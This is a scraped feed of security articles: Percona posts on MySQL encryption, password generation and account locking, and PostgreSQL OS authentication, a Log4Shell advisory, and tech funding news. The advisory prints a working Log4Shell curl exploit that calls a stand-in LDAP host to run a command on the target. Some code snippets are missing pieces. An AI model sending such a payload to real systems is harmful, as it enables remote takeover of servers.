Percona Server for MySQL Encryption Options and Choices

Percona Server for MySQL Encryption

Percona Server for MySQL EncryptionSecurity will always be a main focal point of a company’s data. A common question I get from clients is, “how do I enable encryption?” Like every good consulting answer, it depends on what you are trying to encrypt. This post is a high-level summary of the different options available for encryption in Percona Server for MySQL.

Different certifications require different levels of encryption. For example, PCI requires both encryptions of data at rest and in transit. Here are the main facets of encryption for MySQL:

  • Data at Rest
    • Full disk encryption (at the OS level)
    • Transparent Data Encryption – TDE
    • Column/field-level encryption
  • Data in Transit
    • TLS Connections

Data at Rest

Data at rest is frequently the most asked about part of encryption. Data at rest encryption has multiple components, but at the core is simply ensuring that the data is encrypted at some level when stored. Here are the primary ways we can look at the encryption of data at rest.

Full Disk Encryption (FDE)

This is the easiest and most portable method of encrypting data at rest. When using full disk encryption, the main goal is to protect the hard drives in the event they are compromised. If a disk is removed from the server or the server is removed from a rack, the disk isn’t readable without the encryption key.

This can be managed in different ways, but the infrastructure team generally handles it. Frequently, enterprises already have disk encryption as part of the infrastructure stack. This makes FDE a relatively easy option for data at rest encryption. It also has the advantage of being portable. Regardless of which database technology you use, the encryption is managed at the server level.

The main disadvantage of FDE is that when the server is running, and the disk is mounted, all data is readable. It offers no protection against an attack on a running server once mounted.

Transparent Data Encryption (TDE)

Moving up the chain, the next option for data at rest encryption is Transparent Data Encryption (TDE). In contrast to FDE, this method encrypts the actual InnoDB data and log files. The main difference with database TDE is that the encryption is managed through the database, not at the server level. With this approach, the data and log files are encrypted on disk by the database. As data is read by MySQL/queries, the encrypted pages are read from disk and decrypted to be loaded into InnoDB’s buffer pool for execution.

For this method, the encryption keys are managed either through local files or a remote KMS (such as Hashicorp Vault) with the keyring_plugin. While this approach helps prevent any OS user from simply copying data files, the decrypted data does reside in memory which could be susceptible to a clever hacker. We must rely on OS-level memory protections for further assurance. It also adds a level of complexity for key management and backups that is now shifted to the DBA team.

Column Level Encryption

While the prior methods of at-rest encryption can help to meet various compliance requirements, both are limited when it comes to a running system. In either case, if a running system is compromised, the data stored is fully readable. Column level encryption works to protect the data in a running system without a key. Without a key, the data in the encrypted column is unreadable.

While this method protects selected data in a running system, it often requires application-level changes. Inserts are done with a specific encryption function (AES_ENCRYPT in MySQL, for example). To read the data, AES_DECRYPT with the specified key is required. The main risk with this approach is sending the plaintext values as part of the query. This can be sniffed if not using TLS or potentially leaked through log files. The better approach is to encrypt the data in the application BEFORE sending it to MySQL to ensure no plaintext is ever passed between systems.

In some cases, you can use a shared key for the entire application. Other approaches would be to use an envelope method and store a unique key alongside each encrypted value (protected by a separate master key).

Either way, it is important to understand one of the primary downsides to this approach – indexes and sort order can and will be impacted. For example, if you are encrypting the SSN number, you won’t be able to sort by SSN within MySQL. You would be able to look up a row using the SSN number but would need to pass the encrypted value.

Data in Transit

Now that we’ve discussed the different types of data-at-rest encryption, it is important to encrypt traffic to and from the database. Connecting to the server via TLS ensures that any sensitive sent to or from the server is encrypted. This can prevent data from leaking over the wire or via man-in-the-middle attacks.

This is a straightforward way to secure communication, and when combined with some at-rest encryption, serves to check a few more boxes towards various compliances.


Overall, there are several aspects of encryption in MySQL. This makes it possible to meet many common compliance requirements for different types of regulations. Security is a critical piece of the database tier, and these discussions are needed across teams in an organization. Ensuring that security, infrastructure, and the database team are on the same page is essential, especially during the design phase. Let our Professional Services team help you implement the approach that is best suited for your requirements – we are here to help!

Percona Distribution for MySQL is the most complete, stable, scalable, and secure, open-source MySQL solution available, delivering enterprise-grade database environments for your most critical business applications… and it’s free to use!

Download Percona Distribution for MySQL Today


Log4JShell Vulnerability Update

Log4JShell Vulnerability Update

Log4JShell Vulnerability UpdatePercona Security has been tracking an evolving issue over the weekend and into the beginning of this week.

The Log4J vulnerability, also sometimes referred to as Log4JShell, can be exploited to allow for the complete takeover of the target to run any arbitrary code.

This affects versions of log4j 2.0-beta9 through 2.14.1 – the current advisory is to update to the fixed release version 2.15.0 or greater.

The Exploit

The most simplistic example being:  

curl https://target.domain.tld -H 'X-Api-Version: ${jndi:ldap://malicious_server/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}' -o/dev/null -v

when executed this runs touch /tmp/pwned on the target system.

There are many such examples being tracked at the time of writing which seeks to either exploit the issue or at the very least confirm the presence of the issue.

Is any Percona Software or Service Affected by this Vulnerability?

At the time of writing, no Percona software is known to be affected by the CVE-2021-44228 log4j vulnerability as we do not employ Java in any of the Open Source Software produced here at Percona at this time.

We are of course working with our service vendors and third parties to ensure they too are not affected by this issue and are tracking their response internally via JIRA ticket at the time of writing. Percona is not aware of any of our service providers impacted by the log4j vulnerability at the time of writing.

Where possible, we are employing methods to increase visibility, and protection against this issue regardless of the underlying software not being affected to apply additional layers of protection.

We have validated that the software we are using in our build pipelines is not affected by this issue at the time of writing.

Please refer to the details on https://www.percona.com/security regarding the appropriate channels of contact, should you wish to raise a direct contact request regarding this or another issue.

UPDATE 2021-12-15:

The fix implemented in 2.15 of log4j has been reported as an “incomplete” fix; the new CVE to track this issue is CVE-2021-45046, as such log4j currently requires updating to >= 2.16 to fully protect against these issues, whilst this latest issue is reported as moderate (not high) severity (likely due to the complexity of the exploitation vector), our advice at this time is to ensure update to address this also at this time.

Percona continues to track this major issue and take appropriate action to safeguard our clients and users.

We are working on enhancing defences and active scanning and reporting for indicators of the log4j issues, at this stage, regardless of not having been affected directly by this issue at this point in time, we wish to safeguard against this in the future by taking appropriate measures to safeguard against this.

Our teams are working diligently on this issue, and we expect to publish further updates as this issue continues to unfold and further detail becomes available through our testing and through the publication of information.

David Busby
Information Security Architect


MySQL 8: Random Password Generator

MySQL 8 Random Password Generator

MySQL 8 Random Password GeneratorAs part of my ongoing focus on MySQL 8 user and password management, I’ve covered how using the new dual passwords feature can reduce the overall DBA workload and streamline the management process. I’ve also covered how the new password failure tracking features can enable the locking of an account with too many failed password attempts (see MySQL 8: Account Locking).

There are other new and useful features that have been added to the user management capabilities in MySQL 8 however, and an often overlooked change was the implementation of a random password generator. First introduced in MySQL 8.0.18, with this feature, CREATE USER, ALTER USER, and SET PASSWORD statements have the capability of generating random passwords for user accounts as an alternative to explicit administrator specified passwords.

Usage of MySQL 8 Random Password Generator

By default, all MySQL-generated random user/account passwords have a length of 20 characters. This can be changed, however, using the ‘generated_random_password_length’ system variable. With a valid range of 5 to 255, this dynamic variable can be assigned on a global or session-level and determines the overall password length of the randomly generated password.

mysql> SHOW variables LIKE 'generated_random_password_length';
| Variable_name                    | Value |
| generated_random_password_length | 20    |
1 row in set (0.01 sec)

Once a random password has been generated for a given user account, the statement stores the password in the ‘mysql.user’ system table, hashed appropriately for the authentication plugin. The cleartext ‘generated password’ is returned in the result set along with the ‘user’ and ‘host’  so that information is available to the user or application. See below examples:

| user    | host      | generated password   |
| percona | localhost | k%RJ51/kA>,B(74;DBq2 |
1 row in set (0.02 sec)

mysql> ALTER USER 'percona'@'localhost' IDENTIFIED BY RANDOM PASSWORD;
| user    | host      | generated password   |
| percona | localhost | eX!EOssQ,(Hn4dOdw6Om |
1 row in set (0.01 sec)

mysql> SET PASSWORD FOR 'percona'@'localhost' TO RANDOM;
| user    | host      | generated password   |
| percona | localhost | 5ohXP2LBTTPzJ+7oEDL4 |
1 row in set (0.00 sec)


The clear text generated password is logged only in hashed form, so it is never available in plain text anywhere other than the initial result set from the user statement (as above). The authentication plugin is also named in the binlog alongside the hashed password value.  Below are a couple of examples that have been extracted from the MySQL binlog from the ‘percona’@’localhost’ user that we created and altered earlier:

CREATE USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*5978ACEA46C1B81C7BEE2D1470ED1B002FE6840B'
ALTER USER 'percona'@'localhost' IDENTIFIED WITH 'mysql_native_password' AS '*2994ECB14E21A8333C8C2DEDF38311EB714D500C'

In Closing

Human imagination is often a limiting factor in choosing secure passwords. The random password capability introduced in MySQL 8.0.18 ensures that there is a standardized method for truly random and secure passwords in your database environment.

Complete the 2021 Percona Open Source Data Management Software Survey

Have Your Say!


MySQL 8: Account Locking

MySQL 8 Account Locking

MySQL 8 Account LockingAs part of my ongoing focus on MySQL 8 user and password management, I’ve covered how the new dual passwords feature can reduce the overall DBA workload and streamline the management process (see MySQL 8: Dual Passwords). This wasn’t the only change to user/password management in MySQL 8; one of the more security-focused changes was the implementation of temporary account locking, first introduced in MySQL 8.0.19. With this feature, database administrators can now configure user accounts so that too many consecutive login failures can temporarily lock the account.

The account locking feature only applies to the failure of a client to provide a correct password during the connection attempt. It does not apply to failure to connect for other reasons (network issues, unknown user account, etc.). In the case of dual passwords, either of the account passwords that have been set would count as correct during successful authentication.

Usage of MySQL 8 Account Locking

Configurable options are FAILED_LOGIN_ATTEMPTS and PASSWORD_LOCK_TIME, both used with the CREATE USER and ALTER USER statements. A couple of usage examples are:


Once a user has been set up with these options, too many consecutive login failures will result in an error:

ERROR 3957 (HY000) : Access denied for user percona.
Account is blocked for D day(s) (R day(s) remaining) due to N consecutive failed logins. 


This option determines whether or not to track account login attempts with an incorrect password. The number N specifies how many consecutive wrong password attempts will lock the account.


This option indicates how long an account will remain locked after too many consecutive incorrect password attempts. The number N specifies the number of days the account will remain locked. For a more permanent account lockout, setting this to UNBOUNDED stipulates that the duration of the locked state is now unbounded and does not end until the account is manually unlocked.

  • For both options, permitted values for N are between 0 and 32,767. Note that if setting the value to 0, the option is disabled. 
  • Note that for failed login tracking and locking to occur for an account, both of the above options must be set to a non-zero value. 
  • When creating a new user, not specifying either of the above options, the implicit default value is 0 for any accounts named in the statement. 
    • In other words, failed login tracking and temporary account locking are disabled when these options are not specified. 
    • This also applies to any accounts created before the introduction of this feature. 
  • When altering a user, not specifying either of the above options means the existing values will remain unchanged for all accounts named by the statement. 
  • For temporary account locking to occur, the password failures must be consecutive. 
    • Any successful login before reaching the FAILED_LOGIN_ATTEMPTS value for that user will reset the failure counting. 
  • Once an account has been temporarily locked, it is impossible to log in even with the correct password until either the lock duration has passed or the account is unlocked by one of the account reset methods below. 

Resetting Account Locks

State information for each account regarding failed login tracking, and account lock status, happens every time the server reads the grant tables. An account’s state information can be reset, resetting the failed-login count and unlocking the account if it is already locked. Account resets can be global for all accounts or limited to a single account. 

Global Reset

  • A global reset of all accounts occur for any of the following conditions:
    • MySQL server restart.
    • Execution of FLUSH PRIVILEGES.

Single Account Reset

  • A per-account reset occurs for any of the following conditions:
    • Successful login for the account.
    • Expiration of the lock duration.
      • Failed login counting resets and resumes at the time of the next login attempt.
    • Execution of an ALTER USER statement for the account that sets either of the above options (or both) to any value, or the execution of an ALTER USER … UNLOCK statement for the account.
      • No other ALTER USER statements have any effect on the failed-login counter or the account lock state.

Account Locking Behavior

The account locking state is recorded in the ‘account_locked’ column of the mysql.user system table. The output from SHOW CREATE USER indicates whether an account is locked or unlocked.

If a client attempts to connect to an account that is locked, the attempt will fail. In this case, the server also increments the ‘Locked_connects’ status variable that indicates the number of attempts to connect to a locked account, an error message is displayed, and the attempt is logged to the MySQL error log:

Access denied for user ‘percona’@’localhost’.
Account is locked.

Locking an account does not affect connecting using a proxy user that assumes the identity of the locked account. It also does not affect the ability to execute stored procedures or views with the DEFINER attribute set to the locked account.

In Closing

While this is another relatively simple feature, it can significantly impact how your company manages the security aspects of failed login attempts. This leads to a more secure database environment and better client management overall. Having this ability has also proven helpful during maintenance operations to disable access from specific accounts or as a security measure to lock privileged accounts and unlock them only during application maintenance.

Not running MySQL 8 yet? A colleague pointed out that a similar functionality was available in earlier versions of MySQL by utilizing the Connection-Control Plugin. With this plugin, too many consecutive failed attempts would increase the delay in the server response to help avoid or minimize brute force attacks. If there is interest, I may cover this plugin in more detail in a future blog post. Let me know!

Complete the 2021 Percona Open Source Data Management Software Survey

Have Your Say!


TrueFort snares $30M Series B to expand zero trust application security solution

As companies try to navigate an ever-changing security landscape, it can be challenging to protect everything. Security startup TrueFort has built a zero trust solution focusing on protecting enterprise applications. Today, the company announced a $30 million Series B.

Shasta Ventures led today’s round with participation from new firms Canaan and Ericsson Ventures along with existing investors Evolution Equity Partners, Lytical Ventures and Emerald Development Managers. Under the terms of the agreement Nitin Chopra, managing director at Shasta Ventures, will be joining the company board. Today’s investment brings the total raised to almost $48 million.

CEO and co-founder Sameer Malhotra says that TrueFort protects customers by analyzing at each application and figuring out what normal behavior looks like. Once it understands that, it will flag anything that falls outside of the norm. The company achieves this by gathering data from partners like CrowdStrike and from multiple points within the application and infrastructure.

“Once we get this telemetry, whether it’s networks, endpoints, servers or third-party partners, we then help the customer build a picture of what those applications are doing and what’s normal behavior. We then help them baseline that, and monitor that in real time with response and real-time controls to continue those applications through their normal life cycle,” he said.

Zero trust is a concept where as a matter of policy you assume that you cannot trust any individual or device until the entity proves it belongs on your systems. Malhotra says that customers are becoming more comfortable with the concept and in 2020 the company saw massive 650% YoY revenue growth, with it up 120% YoY this year so far.

“We are seeing the demand, especially as zero trust is becoming a more familiar vernacular amongst the security community […]. Again, it’s having the visibility and understanding, and then being able to then reduce it to the limited number of acceptable relationships or executions,” he said. And he believes that it all comes down to understanding your applications and how they operate.

TrueFort co-founders Nazario Parsacala and Sameer Malhotra

TrueFort co-founders Nazario Parsacala and Sameer Malhotra. Image Credits: TrueFort

The company currently has 60 employees, with hopes of reaching 85 or 90 by the end of the year. Malhotra says that as they build the employee base, they are driving to make it diverse at every level.

“We look at diversity across our whole management team, all the way from the board down to our different levels. We are quite aggressive in hiring diverse candidates, whether they’re women or LGBTQ or people of color. And we have focused programs where we work with different universities […] to bring on new employees from a diverse talent pool. We also work with different recruiters from that perspective, and our focus is always to look at a different palette and to make sure that we’re as diverse an organization as we can,” he said.

The company was founded in 2015 by Malhotra and his partner Nazario Parsacala, both of whom spent more than 20 years working at big financial services companies — Goldman Sachs and JP Morgan. They worked for a couple of years building the program, launching the first beta in 2017 before bringing the first generally available product to market the following year.

Currently customers can install the solution on prem or in the cloud of their choice, but the company has a SaaS solution in the works as well, that will be ready in the next couple of months.


Linux 5.14 set to boost future enterprise application security

Linux is set for a big release this Sunday August 29, setting the stage for enterprise and cloud applications for months to come. The 5.14 kernel update will include security and performance improvements.

A particular area of interest for both enterprise and cloud users is always security and to that end, Linux 5.14 will help with several new capabilities. Mike McGrath, vice president, Linux Engineering at Red Hat told TechCrunch that the kernel update includes a feature known as core scheduling, which is intended to help mitigate processor-level vulnerabilities like Spectre and Meltdown, which first surfaced in 2018. One of the ways that Linux users have had to mitigate those vulnerabilities is by disabling hyper-threading on CPUs and therefore taking a performance hit. 

“More specifically, the feature helps to split trusted and untrusted tasks so that they don’t share a core, limiting the overall threat surface while keeping cloud-scale performance relatively unchanged,” McGrath explained.

Another area of security innovation in Linux 5.14 is a feature that has been in development for over a year-and-a-half that will help to protect system memory in a better way than before. Attacks against Linux and other operating systems often target memory as a primary attack surface to exploit. With the new kernel, there is a capability known as memfd_secret () that will enable an application running on a Linux system to create a memory range that is inaccessible to anyone else, including the kernel.

“This means cryptographic keys, sensitive data and other secrets can be stored there to limit exposure to other users or system activities,” McGrath said.

At the heart of the open source Linux operating system that powers much of the cloud and enterprise application delivery is what is known as the Linux kernel. The kernel is the component that provides the core functionality for system operations. 

The Linux 5.14 kernel release has gone through seven release candidates over the last two months and benefits from the contributions of 1,650 different developers. Those that contribute to Linux kernel development include individual contributors, as well large vendors like Intel, AMD, IBM, Oracle and Samsung. One of the largest contributors to any given Linux kernel release is IBM’s Red Hat business unit. IBM acquired Red Hat for $34 billion in a deal that closed in 2019.

“As with pretty much every kernel release, we see some very innovative capabilities in 5.14,” McGrath said.

While Linux 5.14 will be out soon, it often takes time until it is adopted inside of enterprise releases. McGrath said that Linux 5.14 will first appear in Red Hat’s Fedora community Linux distribution and will be a part of the future Red Hat Enterprise Linux 9 release. Gerald Pfeifer, CTO for enterprise Linux vendor SUSE, told TechCrunch that his company’s openSUSE Tumbleweed community release will likely include the Linux 5.14 kernel within ‘days’ of the official release. On the enterprise side, he noted that SUSE Linux Enterprise 15 SP4, due next spring, is scheduled to come with Kernel 5.14. 

The new Linux update follows a major milestone for the open source operating system, as it was 30 years ago this past Wednesday that creator Linus Torvalds (pictured above) first publicly announced the effort. Over that time Linux has gone from being a hobbyist effort to powering the infrastructure of the internet.

McGrath commented that Linux is already the backbone for the modern cloud and Red Hat is also excited about how Linux will be the backbone for edge computing – not just within telecommunications, but broadly across all industries, from manufacturing and healthcare to entertainment and service providers, in the years to come.

The longevity and continued importance of Linux for the next 30 years is assured in Pfeifer’s view.  He noted that over the decades Linux and open source have opened up unprecedented potential for innovation, coupled with openness and independence.

“Will Linux, the kernel, still be the leader in 30 years? I don’t know. Will it be relevant? Absolutely,” he said. “Many of the approaches we have created and developed will still be pillars of technological progress 30 years from now. Of that I am certain.”




PostgreSQL Database Security: OS – Authentication

PostgreSQL Database Security OS - Authentication

Security is everybody’s concern when talking about data and information, and therefore it becomes the main foundation of every database. Security means protecting your data from unauthorized access. That means only authorized users can log in to a system called authentication; a user can only do what they are authorized to do (authorization) and log the user activity (accounting). I have explained these in my main security post, PostgreSQL Database Security: What You Need To Know.

When we are talking about security, authentication is the first line of defense. PostgreSQL provides various methods of authentication, which are categorized into three categories.

In most cases, PostgreSQL is configured to be used with internal authentication. Therefore I have discussed all internal authentication in the previous blog post I mentioned above. In this blog, we will discuss the operating system-based authentication methods for PostgreSQL. There are three methods to do OS-Based authentication.


Ident authentication only supports TCP/IP connections. Its ident server provides a mechanism to map the client’s operating system username onto the database username. It also has the option for username mapping.

# TYPE  DATABASE        USER            ADDRESS                 METHOD
# "local" is for Unix domain socket connections only
local   all             all                                     trust
# IPv4 local connections:
host    all             all               ident
# IPv6 local connections:
host    all             all             ::1/128                 trust
# Allow replication connections from localhost, by a user with the

$ psql postgres -h -U postgres
psql: error: connection to server at "", port 5432 failed: FATAL:  Ident authentication failed for user "postgres"

If no ident server is installed, you will need to install the ident2 on your ubuntu box or oidentd on CentOS 7. Once you have downloaded and configured the ident server, it is now time to configure PostgreSQL. It starts with creating a user map in “pg_ident.conf” file.

# Put your actual configuration here
# ----------------------------------
PG_USER         vagrant                 postgres

Here we have mapped our system user “vagrant” user with PostgreSQL’s “postgres.” Time to login using the user vagrant.

$ psql postgres -h -U postgres
psql (15devel)
Type "help" for help.


Note: The Identification Protocol is not intended as an authorization or access control protocol.

PAM (Pluggable Authentication Modules)

PAM (Pluggable Authentication Modules) authentication works similarly to “passwords.” You’d have to create a PAM service file that should enable PAM-based authentication. The service name should be set to “PostgreSQL.”

Once the service is created, PAM can now validate user name/password pairs and optionally the connected remote hostname or IP address. The user must already exist in the database for PAM authentication to work.

$ psql postgres -h -U postgres
Password for user postgres: 
2021-08-11 13:16:38.332 UTC [13828] LOG:  pam_authenticate failed: Authentication failure
2021-08-11 13:16:38.332 UTC [13828] FATAL:  PAM authentication failed for user "postgres"
2021-08-11 13:16:38.332 UTC [13828] DETAIL:  Connection matched pg_hba.conf line 91: "host    all             all               pam"
psql: error: connection to server at "", port 5432 failed: FATAL:  PAM authentication failed for user "postgres"

Ensure that the PostgreSQL server supports PAM authentication. It is a compile-time option that must be set when the server binaries were built. You can check if your PostgreSQL server supports PAM authentication using the following command.

$ pg_config | grep with-pam

CONFIGURE =  '--enable-tap-tests' '--enable-cassert' '--prefix=/usr/local/pgsql/' '--with-pam'

In case there is no PAM server file for PostgreSQL under /etc/pam.d, you’d have to create it manually. You may choose any name for the file; however, I prefer to name it “postgresql.”

$ /etc/pam.d/PostgreSQL

@include common-auth
@include common-account
@include common-session
@include common-password

Since the PostgreSQL user cannot read the password files, install sssd (SSSD – System Security Services Daemon) to bypass this limitation.

sudo apt-get install sssd

Add postgresql to the “ad_gpo_map_remote_interactive” to the “/etc/sssd/sssd.conf”

$ cat /etc/sssd/sssd.conf
ad_gpo_map_remote_interactive = +postgresql

Start sssd service, and check the status that it has properly started.

$ sudo systemctl start sssd

$ sudo systemctl status sssd

sssd.service - System Security Services Daemon

     Loaded: loaded (/lib/systemd/system/sssd.service; enabled; vendor preset: enabled)

     Active: active (running) since Wed 2021-08-11 16:18:41 UTC; 12min ago

   Main PID: 1393 (sssd)

      Tasks: 2 (limit: 1071)

     Memory: 5.7M

     CGroup: /system.slice/sssd.service

             ??1393 /usr/sbin/sssd -i --logger=files

             ??1394 /usr/libexec/sssd/sssd_be --domain shadowutils --uid 0 --gid 0 --logger=files

Time now to configure pg_hba.conf to use the PAM authentication. We need to specify the PAM service name (pamservice) as part of authentication options. This should be the same as the file you have created in the /etc/pam.d folder, which in my case is postgresql.

# "local" is for Unix domain socket connections only

local   all             all                                     trust

# IPv4 local connections:

host    all             all               pam pamservice=postgresql

# IPv6 local connections:

host    all             all             ::1/128                 trust

# Allow replication connections from localhost, by a user with the

We must now reload (or restart) the PostgreSQL server. After this, you can try to login into the PostgreSQL server.

vagrant@ubuntu-focal:~$ psql postgres -h -U postgres
psql (15devel)
Type "help" for help.


If PAM is set up to read /etc/shadow, authentication will fail because the PostgreSQL server is started by a non-root user. However, this is not an issue when PAM is configured to use LDAP or other authentication methods.


Peer authentication is “ident”ical; i.e., Very much like the ident authentication! The only subtle differences are there are no ident servers, and this method works on local connections rather than over TCP/IP.

The peer authentication provides a mechanism to map the client’s operating system username onto the database username. It also has the option for username mapping.  The configuration is very similar to how we configured for ident authentication except that the authentication method is specified as “peer” instead of “ident.”

$ cat $PGDATA/pg_hba.conf

# TYPE  DATABASE        USER            ADDRESS                 METHOD

# "local" is for Unix domain socket connections only
local   all             all                                   peer map=PG_USER
# IPv4 local connections:
host    all             all               trust

$ psql postgres -U postgres

2021-08-12 10:51:11.855 UTC [1976] LOG:  no match in usermap "PG_USER" for user "postgres" authenticated as "vagrant"

2021-08-12 10:51:11.855 UTC [1976] FATAL:  Peer authentication failed for user "postgres"

2021-08-12 10:51:11.855 UTC [1976] DETAIL:  Connection matched pg_hba.conf line 89: "local   all             all                                     peer map=PG_USER"

psql: error: connection to server on socket "/tmp/.s.PGSQL.5432" failed: FATAL:  Peer authentication failed for user "postgres"

$PGDATA/pg_hba.conf configuration will look something like this:

$ cat $PGDATA/pg_hba.conf
# TYPE  DATABASE        USER            ADDRESS                 METHOD
# "local" is for Unix domain socket connections only

local   all             all                                     peer map=PG_USER
# IPv4 local connections:


# Put your actual configuration here
# ----------------------------------
PG_USER         vagrant                postgres

vagrant@ubuntu-focal:~$ psql postgres -U postgres
psql (15devel)
Type "help" for help.


We’ve covered several different authentication methods in this blog. These basic authentication methods involve the PostgreSQL server, kernel, and the ident server; options are available natively without any major external dependencies. It is, however, important that the database is secured properly to prevent unauthorized access to the data.

Percona Distribution for PostgreSQL provides the best and most critical enterprise components from the open-source community in a single distribution, designed and tested to work together.

Download Percona Distribution for PostgreSQL Today!


ActiveFence comes out of the shadows with $100M in funding and tech that detects online harm, now valued at $500M+

Online abuse, disinformation, fraud and other malicious content is growing and getting more complex to track. Today, a startup called ActiveFence is coming out of the shadows to announce significant funding on the back of a surge of large organizations using its services. ActiveFence has quietly built a tech platform to suss out threats as they are being formed and planned to make it easier for trust and safety teams to combat them on platforms.

The startup, co-headquartered in New York and Tel Aviv, has raised $100 million, funding that it will use to continue developing its tools and to continue expanding its customer base. To date, ActiveFence says that its customers include companies in social media, audio and video streaming, file sharing, gaming, marketplaces and other technologies — it has yet to disclose any specific names but says that its tools collectively cover “billions” of users. Governments and brands are two other categories that it is targeting as it continues to expand. It has been around since 2018 and is growing at around 100% annually.

The $100 million being announced today actually covers two rounds: Its most recent Series B led by CRV and Highland Europe, as well as a Series A it never announced led by Grove Ventures and Norwest Venture Partners. Vintage Investment Partners, Resolute Ventures and other unnamed backers also participated. It’s not disclosing valuation but I understand it’s over $500 million.

“We are very honored to be ActiveFence partners from the very earliest days of the company, and to be part of this important journey to make the internet a safer place and see their unprecedented success with the world’s leading internet platforms,” said Lotan Levkowitz, general partner at Grove Ventures, in a statement.

The increased presence of social media and online chatter on other platforms has put a strong spotlight on how those forums are used by bad actors to spread malicious content. ActiveFence’s particular approach is a set of algorithms that tap into innovations in AI (natural language processing) and to map relationships between conversations. It crawls all of the obvious, and less obvious and harder-to-reach parts of the internet to pick up on chatter that is typically where a lot of the malicious content and campaigns are born — some 3 million sources in all — before they become higher-profile issues. It’s built both on the concept of big data analytics as well as understanding that the long tail of content online has a value if it can be tapped effectively.

“We take a fundamentally different approach to trust, safety and content moderation,” Noam Schwartz, the co-founder and CEO, said in an interview. “We are proactively searching the darkest corners of the web and looking for bad actors in order to understand the sources of malicious content. Our customers then know what’s coming. They don’t need to wait for the damage, or for internal research teams to identify the next scam or disinformation campaign. We work with some of the most important companies in the world, but even tiny, super niche platforms have risks.”

The insights that ActiveFence gathers are then packaged up in an API that its customers can then feed into whatever other systems they use to track or mitigate traffic on their own platforms.

ActiveFence is not the only company building technology to help platform operators, governments and brands have a better picture of what is going on in the wider online world. Factmata has built algorithms to better understand and track sentiments online; Primer (which also recently raised a big round) also uses NLP to help its customers track online information, with its customers including government organizations that used its technology to track misinformation during election campaigns; Bolster (formerly called RedMarlin) is another.

Some of the bigger platforms have also gotten more proactive in bringing tracking technology and talent in-house: Facebook acquired Bloomsbury AI several years ago for this purpose; Twitter has acquired Fabula (and is working on a bigger efforts like Birdwatch to build better tools), and earlier this year Discord picked up Sentropy, another online abuse tracker. In some cases, companies that more regularly compete against each other for eyeballs and dollars are even teaming up to collaborate on efforts.

Indeed, it may well be that ultimately there will exist multiple efforts and multiple companies doing good work in this area, not unlike other corners of the world of security, which might need more than one hammer thrown at problems to crack them. In this particular case, the growth of the startup to date, and its effectiveness in identifying early warning signs, is one reason investors have been interested in ActiveFence.

“We are pleased to support ActiveFence in this important mission,” commented Izhar Armony, a general partner at CRV, in a statement. “We believe they are ready for the next phase of growth and that they can maintain leadership in the dynamic and fast-growing trust and safety market.”

“ActiveFence has emerged as a clear leader in the developing online trust and safety category. This round will help the company to accelerate the growth momentum we witnessed in the past few years,” said Dror Nahumi, general partner at Norwest Venture Partners, in a statement.


Quantexa raises $153M to build out AI-based big data tools to track risk and run investigations

As financial crime has become significantly more sophisticated, so too have the tools that are used to combat it. Now, Quantexa — one of the more interesting startups that has been building AI-based solutions to help detect and stop money laundering, fraud and other illicit activity — has raised a growth round of $153 million, both to continue expanding that business in financial services and to bring its tools into a wider context, so to speak: linking up the dots around all customer and other data.

“We’ve diversified outside of financial services and working with government, healthcare, telcos and insurance,” Vishal Marria, its founder and CEO, said in an interview. “That has been substantial. Given the whole journey that the market’s gone through in contextual decision intelligence as part of bigger digital transformation, was inevitable.”

The Series D values the London-based startup between $800 million and $900 million on the heels of Quantexa growing its subscriptions revenues 108% in the last year.

Warburg Pincus led the round, with existing backers Dawn Capital, AlbionVC, Evolution Equity Partners (a specialist cybersecurity VC), HSBC, ABN AMRO Ventures and British Patient Capital also participating. The valuation is a significant hike up for Quantexa, which was valued between $200 million and $300 million in its Series C last July. It has now raised over $240 million to date.

Quantexa got its start out of a gap in the market that Marria identified when he was working as a director at Ernst & Young tasked with helping its clients with money laundering and other fraudulent activity. As he saw it, there were no truly useful systems in the market that efficiently tapped the world of data available to companies — matching up and parsing both their internal information as well as external, publicly available data — to get more meaningful insights into potential fraud, money laundering and other illegal activities quickly and accurately.

Quantexa’s machine learning system approaches that challenge as a classic big data problem — too much data for a human to parse on their own, but small work for AI algorithms processing huge amounts of that data for specific ends.

Its so-called “Contextual Decision Intelligence” models (the name Quantexa is meant to evoke “quantum” and “context”) were built initially specifically to address this for financial services, with AI tools for assessing risk and compliance and identifying financial criminal activity, leveraging relationships that Quantexa has with partners like Accenture, Deloitte, Microsoft and Google to help fill in more data gaps.

The company says its software — and this, not the data, is what is sold to companies to use over their own data sets — has handled up to 60 billion records in a single engagement. It then presents insights in the form of easily digestible graphs and other formats so that users can better understand the relationships between different entities and so on.

Today, financial services companies still make up about 60% of the company’s business, Marria said, with seven of the top 10 U.K. and Australian banks and six of the top 14 financial institutions in North America among its customers. (The list includes its strategic backer HSBC, as well as Standard Chartered Bank and Danske Bank.)

But alongside those — spurred by a huge shift in the market to rely significantly more on wider data sets, to businesses updating their systems in recent years, and the fact that, in the last year, online activity has in many cases become the “only” activity — Quantexa has expanded more significantly into other sectors.

“The Financial crisis [of 2007] was a tipping point in terms of how financial services companies became more proactive, and I’d say that the pandemic has been a turning point around other sectors like healthcare in how to become more proactive,” Marria said. “To do that you need more data and insights.”

So in the last year in particular, Quantexa has expanded to include other verticals facing financial crime, such as healthcare, insurance, government (for example in tax compliance) and telecoms/communications, but in addition to that, it has continued to diversify what it does to cover more use cases, such as building more complete customer profiles that can be used for KYC (know your customer) compliance or to serve them with more tailored products. Working with government, it’s also seeing its software getting applied to other areas of illicit activity, such as tracking and identifying human trafficking.

In all, Quantexa has “thousands” of customers in 70 markets. Quantexa cites figures from IDC that estimate the market for such services — both financial crime and more general KYC services — is worth about $114 billion annually, so there is still a lot more to play for.

“Quantexa’s proprietary technology enables clients to create single views of individuals and entities, visualized through graph network analytics and scaled with the most advanced AI technology,” said Adarsh Sarma, MD and co-head of Europe at Warburg Pincus, in a statement. “This capability has already revolutionized the way KYC, AML and fraud processes are run by some of the world’s largest financial institutions and governments, addressing a significant gap in an increasingly important part of the industry. The company’s impressive growth to date is a reflection of its invaluable value proposition in a massive total available market, as well as its continued expansion across new sectors and geographies.”

Interestingly, Marria admitted to me that the company has been approached by big tech companies and others that work with them as an acquisition target — no real surprises there — but longer term, he would like Quantexa to consider how it continues to grow on its own, with an independent future very much in his distant sights.

“Sure, an acquisition to the likes of a big tech company absolutely could happen, but I am gearing this up for an IPO,” he said.


Cloud security platform Netskope boosts valuation to $7.5B following $300M raise

Netskope, focused on Secure Access Service Edge architecture, announced Friday a $300 million investment round on a post-money valuation of $7.5 billion.

